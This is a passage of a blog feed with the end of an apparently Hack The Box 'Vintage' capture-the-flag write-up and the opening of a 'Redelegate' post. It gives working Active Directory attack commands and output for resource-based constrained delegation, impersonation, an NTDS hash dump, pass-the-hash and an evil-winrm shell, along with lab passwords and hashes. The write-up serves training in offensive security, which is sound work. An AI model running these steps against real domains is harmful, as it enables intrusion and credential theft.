data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:165350,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09cf04ab-871d-4348-b642-82b4b6bee1c2_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!t4cL!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!t4cL!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!t4cL!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!t4cL!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F22e1677b-fcb9-4e18-a910-dace14d061d4_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But however we have Shorter paths to DC, seems like we can do delegations family since we have &#8220;AllowedToAct&#8220; upon DC01 computer to the main DC.</p><p>So here we can perform RBCD, and maybe for the SPN and impersonation gaining user &#8220;L.Bianchi_ADM&#8221; was already as good and gaining Administrator.</p><ol start="9"><li><p><em>RBCD Attack</em></p></li></ol><p>To Pull this attack we need &#8220;C.Neri_ADM&#8221; user to have SPNs, but since we don&#8217;t have it but we have &#8220;GenericWrite&#8221; we can just:</p><ul><li><p>Add user who have it (FS01$)</p></li><li><p>Then we request the ticket behalf of somebody else</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u C.Neri_adm -p Uncr4ck4bl3P4ssW0rd0312 -k --find-delegation
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\C.Neri_adm:Uncr4ck4bl3P4ssW0rd0312 
LDAP        dc01.vintage.htb 389    DC01             AccountName     AccountType DelegationType             DelegationRightsTo
LDAP        dc01.vintage.htb 389    DC01             --------------- ----------- -------------------------- ------------------
LDAP        dc01.vintage.htb 389    DC01             DelegatedAdmins Group       Resource-Based Constrained DC01$</code></pre></div><p>Then we add FS01$ machine to &#8220;DelegatedAdmins&#8221; Group</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT vintage.htb/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312 -k                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in c.neri_adm.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=c.neri_adm.ccache 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ klist
Ticket cache: FILE:c.neri_adm.ccache
Default principal: c.neri_adm@VINTAGE.HTB

Valid starting       Expires              Service principal
04/07/2026 01:46:58  04/07/2026 11:46:58  krbtgt/VINTAGE.HTB@VINTAGE.HTB
        renew until 04/08/2026 01:44:31</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodyAD -d vintage.htb -k --host DC01.vintage.htb add groupMember DelegatedAdmins 'FS01$'
[+] FS01$ added to DelegatedAdmins</code></pre></div><p>PS: here&#8217;s the situation (You need) between choosing wants to:</p><ul><li><p>Own the DC ticket</p></li><li><p>Or Own User ticket</p></li></ul><p>Up to you, since I choose to have &#8220;L.Bianchi_ADM&#8221; ticket, I un-set my Kerberos ticket and request the &#8220;L.Bianchi_ADM&#8221; user one:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ unset KRB5CCNAME                                                                                                             
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getST -spn 'cifs/DC01.vintage.htb' -impersonate L.Bianchi_adm -dc-ip 10.129.231.205 vintage.htb/'FS01$':fs01 -k
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating L.Bianchi_adm
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.Bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache</code></pre></div><p>And now supposed we have that &#8220;L.Bianchi_ADM&#8221; access ticket:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=L.Bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache 
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ klist
Ticket cache: FILE:L.Bianchi_adm@cifs_DC01.vintage.htb@VINTAGE.HTB.ccache
Default principal: L.Bianchi_adm@vintage.htb

Valid starting       Expires              Service principal
04/07/2026 01:49:08  04/07/2026 11:49:06  cifs/DC01.vintage.htb@VINTAGE.HTB
        renew until 04/08/2026 01:46:39</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc01.vintage.htb -u L.Bianchi_adm -k --use-kcache
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\L.Bianchi_adm from ccache (Pwn3d!)</code></pre></div><p>Pwned!!</p><ol start="10"><li><p><em>DCSycn Attack</em></p></li></ol><p>So user &#8220;L.BIANCHI_ADM@VINTAGE.HTB&#8220; is on Domain Admin:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9xFq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9xFq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!9xFq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!9xFq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!9xFq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9xFq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:149281,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fae22f36b-34c0-466c-a17f-217ae0fe577a_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9xFq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!9xFq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!9xFq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!9xFq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F336aafc4-b87f-404a-aca4-de09fb122c64_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Now we DCSycn:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec smb dc01.vintage.htb -u L.Bianchi_adm -k --use-kcache --ntds
SMB         dc01.vintage.htb 445    dc01             [*]  x64 (name:dc01) (domain:vintage.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB         dc01.vintage.htb 445    dc01             [+] vintage.htb\L.Bianchi_adm from ccache (Pwn3d!)
SMB         dc01.vintage.htb 445    dc01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc01.vintage.htb 445    dc01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
SMB         dc01.vintage.htb 445    dc01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc01.vintage.htb 445    dc01             krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
SMB         dc01.vintage.htb 445    dc01             M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
SMB         dc01.vintage.htb 445    dc01             R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
SMB         dc01.vintage.htb 445    dc01             L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
SMB         dc01.vintage.htb 445    dc01             G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
SMB         dc01.vintage.htb 445    dc01             C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
SMB         dc01.vintage.htb 445    dc01             P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
SMB         dc01.vintage.htb 445    dc01             svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
SMB         dc01.vintage.htb 445    dc01             svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
SMB         dc01.vintage.htb 445    dc01             svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
SMB         dc01.vintage.htb 445    dc01             C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
SMB         dc01.vintage.htb 445    dc01             L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:6b751449807e0d73065b0423b64687f0:::
SMB         dc01.vintage.htb 445    dc01             DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
SMB         dc01.vintage.htb 445    dc01             gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:0851299c01b944d01099fc977eaa6c67:::
SMB         dc01.vintage.htb 445    dc01             FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
SMB         dc01.vintage.htb 445    dc01             [+] Dumped 17 NTDS hashes to /root/.nxc/logs/ntds/dc01_dc01.vintage.htb_2026-04-07_014821.ntds of which 14 were added to the database
SMB         dc01.vintage.htb 445    dc01             [*] To extract only enabled accounts from the output file, run the following command: 
SMB         dc01.vintage.htb 445    dc01             [*] grep -iv disabled /root/.nxc/logs/ntds/dc01_dc01.vintage.htb_2026-04-07_014821.ntds | cut -d ':' -f1</code></pre></div><p>And we can just logon with Kerberos key and go take the Administrator file access.</p><p>PS: Administrator logon is turned-off in this machine due to:</p><ul><li><p>Hardened</p></li><li><p>AMSI protection</p></li></ul><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT vintage.htb/L.Bianchi_adm -hashes :6b751449807e0d73065b0423b64687f0 -dc-ip 10.129.231.205
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in L.Bianchi_adm.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME=L.Bianchi_adm.ccache                                  
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo evil-winrm -i DC01.vintage.htb -r vintage.htb                                                            
                                        
Evil-WinRM shell v3.9
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Bianchi_adm\Documents&gt; whoami
vintage\l.bianchi_adm
*Evil-WinRM* PS C:\Users\L.Bianchi_adm\Documents&gt; cd C:\users\administrator\desktop
*Evil-WinRM* PS C:\users\administrator\desktop&gt; dir


    Directory: C:\users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          4/7/2026   5:26 AM             34 root.txt


*Evil-WinRM* PS C:\users\administrator\desktop&gt;</code></pre></div><p>That&#8217;s it!!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9G2M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9G2M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 424w, https://substackcdn.com/image/fetch/$s_!9G2M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 848w, https://substackcdn.com/image/fetch/$s_!9G2M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 1272w, https://substackcdn.com/image/fetch/$s_!9G2M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9G2M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png" width="880" height="366" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:366,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:78195,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9G2M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 424w, https://substackcdn.com/image/fetch/$s_!9G2M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 848w, https://substackcdn.com/image/fetch/$s_!9G2M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 1272w, https://substackcdn.com/image/fetch/$s_!9G2M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcea85478-5abb-43a4-8f0e-122dc35bd181_880x366.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/637">labs.hackthebox.com/achievement/machine/2489228/637</a></p></li></ul><p>Until next time and Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Redelegate - Windows (Hard)]]></title><description><![CDATA[Find .kdbx file leading to MSSQL logon access for users and password recovery and found match for local user that have ForceChangePasswd access to User who can perform Delegation as DC for escalation.]]></description><link>https://byt3n33dl3.substack.com/p/htb-redelegate-windows-hard</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-redelegate-windows-hard</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Mon, 27 Apr 2026 13:49:43 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!62LE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!62LE!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!62LE!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 424w, https://substackcdn.com/image/fetch/$s_!62LE!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 848w, https://substackcdn.com/image/fetch/$s_!62LE!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 1272w, https://substackcdn.com/image/fetch/$s_!62LE!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!62LE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png" width="842" height="525" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:525,&quot;width&quot;:842,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:220865,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" 